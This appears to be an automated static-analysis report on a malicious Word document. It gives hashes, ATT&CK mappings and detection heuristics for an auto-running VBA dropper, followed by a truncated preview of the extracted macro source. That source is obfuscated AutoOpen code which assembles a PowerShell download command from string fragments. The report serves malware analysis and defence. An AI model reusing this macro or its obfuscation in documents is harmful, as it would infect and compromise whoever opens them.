Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 98624a3f28b4a20a…

MALICIOUS

Office (OLE)

376.5 KB Created: 2018-10-05 03:41:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: 06b530fa1ca1c706b92d66c3b4f0e85d SHA-1: f53448a875bd990c8e6a39cc1917641a8f1e3121 SHA-256: 98624a3f28b4a20a24834ab5cd80a0e1429d94d5a1841d19e4588d330fcb339e
350 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, which is a common technique for malicious documents. The macro utilizes obfuscation and calls to Shell() and CreateObject(), indicating it is designed to download and execute a second-stage payload. The heuristic 'OLE_VBA_SPLIT_KEYWORD_OBFUSCATION' specifically points to the reassembly of 'scripting.filesystemobject', a strong indicator of malicious intent.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-7154387-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7154387-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 75837 bytes
SHA-256: 0585cbf00f3c450f17755880beef2799692da628d4c6a6c94fd8f047e8eef4ba
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function er()

End Function
Sub AutoOpen()
Const yu_lieu = False
Const ueahfm = True
Const mjixcp3 = True
Const ea_cb_iyfr0 = False
Const koey = True
Const atuua = False

If 7205 <= 1602 Then
Const ijvroi0 = True
Const kyyaicb = False
Const eigloi = False
Const ulah = True
Const lycwdv = False
ElseIf 16 + 9 = 7 Then
Else
uuueiyfky = "$cdfvibhmunnjq_qa='r"
End If
Select Case "usaaywcu"
Case "usaaywcu"
ys_ukc = "sF';$ee"
uuueiyfky = uuueiyfky + ys_ukc
End Select
Const lioeie42 = False

If 6104 >= 9008 Then
Const yeeug = False
Const ukhrryea = False
Const utnpu_vn = True
Const vxuaygpy = True
Const imiag_a = True
ElseIf 6772 < 7168 Then
ycdxuvqbxhs67 = Environ("SystemRoot")
Else
Const mhdppy4 = True
Const uybluyr7 = True
Const cilzt = False
Const rhjibvw = True
Const aoozpoa = True
End If
Const urue = False

Select Case 42 - 21
Case 21
tzunszww = ee_zyoaie + uuueiyfky
tzunszww = tzunszww + "uozlieuoynvsam"
End Select
Select Case "yfnqhofti"
Case "yfnqhofti"
yeutee = mezzofgbjmv + tzunszww + zcmaeyvf_o
yeutee = yeutee + "y='ion"
Case 23242
Const szqo_xbou = False
End Select
Const tyutc = True

Select Case 14 * 13
Case 182
pgqjzkefekp = "Poli';$mc"
Const a_gaets = True
Const djlaee = False
yeutee = yeutee + pgqjzkefekp
End Select
Const n_fqbr = True
Const itgxre = True

If 48 - 2 = 50 Then
Else
kwpoa = yeutee + wxciomz
Const stv_obdku = True
iuxjo = "nicpqneooaygs=''',';$okmvkhcu_ytvijcgb"
kwpoa = kwpoa + iuxjo
End If
Const kpoesrvz = True

Select Case 34 + 33
Case 67
wzivsmhizbw = yiubxfvz + kwpoa + iijwfnhgat
Const vquwpnn = True
Const ynnohi = True
olmnso_rkwdb = "vohly_urvlrrbaby='.W';$xxoydz"
wzivsmhizbw = oyksiwp + wzivsmhizbw + olmnso_rkwdb
End Select
Const jrnko = True
Const sdnopko = False

If 62 + 39 = 23 Then
ElseIf 88 * 63 = 5544 Then
ayua = "rll"
wzivsmhizbw = wzivsmhizbw + ayua
Else
Const tfnvfix = False
Const y_f_i_osnc = False
Const mnxy = True
Const pra_bo_o = True
Const outhu = True
Const u_aufhebx = False
Const mittpo = True
End If
Const mxaeo = False

Select Case "uaue_y"
Case "uaue_y"
wzivsmhizbw = wzivsmhizbw + "u_tcyib_rf_ygnbgewkwik" + m_fnun
Case ajqnkxzikk
Const ihym = True
Case yippcbanw59
Const wgrdgi = False
End Select
Select Case 13 + 38
Case oaiu_srn7
Const hdunuacn37 = False
Case 51
iafdatbb = wzivsmhizbw + aevu7
iafdatbb = iafdatbb + "dymoxbyhv='{ $ua " + viyewvw
End Select
Const ffyqv01 = False
Const trpstzoqfa = False

If 50 + 51 = -1 Then
Const uz_tiia = False
Const ydmf_yph = True
Const eyboxvz = True
Const ywvj_pyy = True
ElseIf 5413 >= 787 Then
Dim bnfripksldy, uacluz As String
bnfripksldy = "\sys"
ycdxuvqbxhs67 = ycdxuvqbxhs67 + bnfripksldy
Else
Const wexlpdvi = True
Const slwiei = False
Const gaqz = True
Const uie_u = True
Const bbpifjr = True
Const hipbz = False
End If
Const gtitpbnxy = False

If 59 - 73 = 132 Then
Const ohcida = True
Const ojyucd = True
Const snrfxt = False
Const p_uikjo = False
Const jfuudjq = True
Const bplaye = True
Const kfcjpgnzup00 = False
Const yyybgrzv = False
Const oale = False
Const wbsmxyeo = False
Else
eyuuqpiwj = iafdatbb
Const gsux_rh = False
Const oixzg = False
eyuuqpiwj = eyuuqpiwj + "= ';$y_xzi"
End If
Const oapyst = True

If 7 * 46 = 322 Then
asfbjk = eyuuqpiwj
Const iupba = False
asfbjk = asfbjk + "z" + qwzfww
End If
Const qjumci = True

If 5532 <= 7014 Then
o_czviyfdet = asfbjk
obcv = "eaefkljyxdoyazcqhsnwcofriob"
o_czviyfdet = o_czviyfdet + obcv + ufhlvra
ElseIf 50 + 51 = -1 Then
Const yhsiu = True
Const sgo_vql = False
Const frksouimh = True
Const qkeabh = True
Else
End If
Select Case 60 * 77
Case 4620
o_czviyfdet = o_czviyfdet + "chs='le(1)';$jncdxoacycyg
... (truncated)